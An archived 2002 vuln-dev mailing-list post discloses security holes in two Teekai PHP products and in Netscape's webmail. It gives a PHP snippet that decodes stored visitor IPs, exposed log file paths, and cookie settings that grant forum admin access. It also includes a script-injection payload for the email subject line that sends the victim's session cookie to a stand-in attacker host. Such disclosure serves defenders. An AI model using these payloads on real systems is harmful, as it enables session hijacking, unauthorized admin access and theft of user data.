[prev in list] [next in list] [prev in thread] [next in thread]
List: vuln-dev
Subject: Security holes in two Teekai's products + security hole in
From: frog frog <leseulfrog () hotmail ! com>
Date: 2002-06-03 19:52:07
[Download RAW message or body]
Hi :)
Products :
**********
Tracking Online 1.0
Teekai's forum full 1.2
http://www.teekai.info
Problems :
**********
Tracking Online & Teekai's forum :
- Informations recovery
- Informations decoding
Teekai's forum :
- Admin access
- small holes
Tracking Online :
-XSS
Exploits :
**********
Forum & Tracking :
- Php file to decode informations :
<?
$cryptedip = explode('.',$cryptedip);
$key = md5("20");
$trueip = $cryptedip[0]/$key.".".$cryptedip[1]/$key.".".$cryptedip[2]/
$key.".".$cryptedip[3]/$key;
echo "Result : $trueip";
?>
Forum :
- /data/member_log.txt
- Setcookie "valid_level=admin"
- Setcookie "valid_username_online=[VALUE e.g. JScript ]"
- ...
Tracking Online :
- /data/userlog/log.txt
- /userlog.php
- ...
More details in french :
http://www.ifrance.com/kitetoua/tuto/Teekai.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%
2Fkitetoua%2Ftuto%2FTeekai.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII
There is a security hole in the mail service that Netscape proposes (
http://ncmail.netscape.com ).
It's making it possible to inject HTML in an e-mail... and this service
authenticates by the cookies.
The hole consists in sending a mail with for subject a jscript preceded
by : ";</script*> .
The idea would be a script of this kind on subject :
";</script*><form name=a*><input name=o
value=http://www.attacker.com/script?*></form*><script*>window.open
(document.a.o.value+document.cookie)</script*>
without '*'.
I use <form> because " and ' are replaced by \" or \'.
Vendors were informs but did not repair.
Maybe more details soon...
Sorry for my poor english.
frog-m@n
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic